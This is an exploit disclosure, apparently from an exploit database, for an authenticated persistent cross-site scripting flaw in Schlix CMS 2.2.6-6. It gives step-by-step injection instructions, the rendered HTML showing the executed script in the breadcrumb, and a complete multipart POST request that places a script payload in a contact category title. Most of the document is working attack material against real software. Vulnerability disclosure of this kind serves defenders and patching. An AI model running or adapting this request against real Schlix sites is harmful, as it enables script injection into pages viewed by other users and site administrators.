# Exploit Title: Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated) # Date: 2021-05-05 # Exploit Author: Emircan Baş # Vendor Homepage: https://www.schlix.com/ # Software Link: https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.6-6.zip # Version: 2.2.6-6 # Tested on: Windows & WampServer ==> Tutorial <== 1- Login with your account. 2- Go to the contacts section. Directory is '/admin/app/contact'. 3- Create a new category and type an XSS payload into the category title. 4- XSS payload will be executed when we travel to created page. ==> Vulnerable Source Code <== <article class="main category"> <div class="media-header-full-width " style="background-image: url('https://static-demo.schlix.website/images/static/sample1/header/header_img_10.jpg');"> <div class="media-header-title container d-flex h-100"> <div class="row align-self-center w-100"> <div class="col-8 mx-auto"> <div class="text-center"> <h1 class="item title" itemprop="headline">&#039;"><script>alert(1)</script></h1> # OUR PAYLOAD IS NON-EXECUTEABLE </div> </div> </div> </div> </div> <div class="breadcrumb-bg"> <div class="container"> <div class="breadcrumb-container"><ol class="breadcrumb"><li class="breadcrumb-item"><a class="breadcrumb-home" href="/cms"> <i class="fa fa-home"></i></a></li><li class="breadcrumb-item"><a href="/cms/contacts/">Contacts</a></li><li class="breadcrumb-item"> <a href="/cms/contacts/script-alert-2-script/"><script>alert(1)</script></a></li></ol></div></div> # EXECUTED PLACE </div> ==> HTTP Request <== POST /admin/app/contacts?action=savecategory HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------280033592236615772622294478489 Content-Length: 4146 Origin: (ORIGIN) Connection: close Referer: (REFERER) Cookie: contacts_currentCategory=6; scx2f1afdb4b86ade4919555d446d2f0909=gi3u57kmk34s77f1fngigm1k1b; gusrinstall=rt9kps56aasmd8445f7ufr7mva; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2 Upgrade-Insecure-Requests: 1 -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="_csrftoken" 49feefcd2b917b9855cd55c8bd174235fa5912e4 -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="cid" 6 -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="parent_id" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="guid" ee34f23a-7167-a454-8576-20bef7575c15 -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="title" <script>alert(1)</script> -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="status" 1 -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="virtual_filename" script-alert-1-script -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="summary" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="description" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="meta_description" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="meta_key" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="tags" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="date_available" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="date_expiry" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="items_per_page" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="options[]" display_pagetitle -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="options[]" __null__ -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="options[]" display_child_categories -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="options[]" __null__ -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="options[]" display_items -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="options[]" __null__ -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="options[child_categories_sortby]" date_created -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="options[items_sortby]" date_created -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="permission_read_everyone" everyone -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="permission_read[]" 1 -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="permission_read[]" 2 -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="permission_read[]" 3 -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="permission_write[]" 1 -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="cmh_media_selection" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="cmh_media_upload"; filename="" Content-Type: application/octet-stream -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="cmh_media_path" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="cmh_media_url" -----------------------------280033592236615772622294478489--